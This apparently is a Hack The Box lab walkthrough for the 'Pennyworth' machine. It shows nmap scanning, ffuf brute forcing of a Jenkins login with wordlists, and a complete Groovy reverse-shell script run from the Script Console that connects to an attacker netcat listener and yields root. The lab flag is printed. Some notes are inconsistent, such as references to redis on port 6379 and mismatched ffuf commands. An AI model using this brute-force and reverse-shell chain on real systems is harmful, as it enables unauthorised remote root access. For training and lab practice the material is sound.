09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)

Common Applications, Jenkins, Java, Reconnaissance, Remote Code Execution, Default Credentials

Previous08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)Next10.TACTICS (SMB)

Last updated 1 month ago

09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)

Common Applications, Jenkins, Java, Reconnaissance, Remote Code Execution, Default Credentials

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 8080/tcp open  http    Jetty 9.4.39.v20210325
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 8080
 PORT   STATE SERVICE VERSION
 8080/tcp open  http    Jetty 9.4.39.v20210325
 |_http-title: Site doesn't have a title (text/html;charset=utf-8).
 |_http-server-header: Jetty(9.4.39.v20210325)
 | http-robots.txt: 1 disallowed entry 
 |_/

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 8080
 PORT   STATE SERVICE
 8080/tcp open  http-proxy
 | http-enum: 
 |_  /robots.txt: Robots file

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#walk the application and identify potential entry points
root@htb:~$ BROWSER > http://10.129.223.232:8080/robots.txt
 # we don't want robots to click "build" links
 User-agent: *
 Disallow: /

root@htb:~$ BROWSER > {targetIP:port}
 Welcome to Jenkins!
 
  * possible vulnerable entry points
    - login form
       - could be vulnerable to brute force attacks
 
root@htb:~$ BROWSER > {targetSite:port}
 username: null
 password: null

 Invalid username or password
         
 * submit expected input

root@htb:~$ find / -iname usernames 2>/dev/null
 /usr/share/seclists/Usernames
root@htb:~$ ls
 top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ find / -iname passwords 2>/dev/null
 /usr/share/seclists/Passwords
root@htb:~$ ls
 500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.178.161:8080
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
 Welcome to Jenkins!
 Username: null
 Password: null
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 POST /j_spring_security_check HTTP/1.1
 Host: 10.129.178.161:8080
 Content-Length: 55
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://10.129.178.161:8080
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.178.161:8080/login?from=%2F
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
 Connection: close

 j_username=null&j_password=null&from=%2F&Submit=Sign+in
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * add the {FUZZ} markers to the username/password section

root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
    * PFUZZ: root
    * UFUZZ: admin

 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
    * PFUZZ: password1
    * UFUZZ: admin

root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r 
 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: admin1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
    * PFUZZ: password
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: root
    * UFUZZ: root

 [Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
    * PFUZZ: password1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
    * PFUZZ: admin
    * UFUZZ: root

root@htb:~$ root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540

 * the -c flag outputs the result in color
 * the -r flag follows HTTP redirects during fuzzing
 * the -fs flag filters results based on content size
 * the -fr flag filters results based on a regex pattern.

 * the final result will contain a handful of possible credentials to use

#
root@htb:~$ nc -nlvp 8088

root@htb:~$ BROWSER > http://10.129.178.161:8080
 username: root
 password: password
 
JENKINS > Manage Jenkins > Script Console

Thread.start {
 String host="{attackerIP}";
 int port=8088;
 String cmd="/bin/bash";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
 OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

 * click the "run" button to have the target connect to the attacker's netcat server

root@htb:~$ nc...
 listening on [any] 8088 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.178.161] 51444
 whoami
  root
 id
  uid=0(root) gid=0(root) groups=0(root)
 find / -iname flag.txt 2>/dev/null
  /root/flag.txt
 cat /root/flag.txt
  9cdfb439c7876e703e307864c9167a15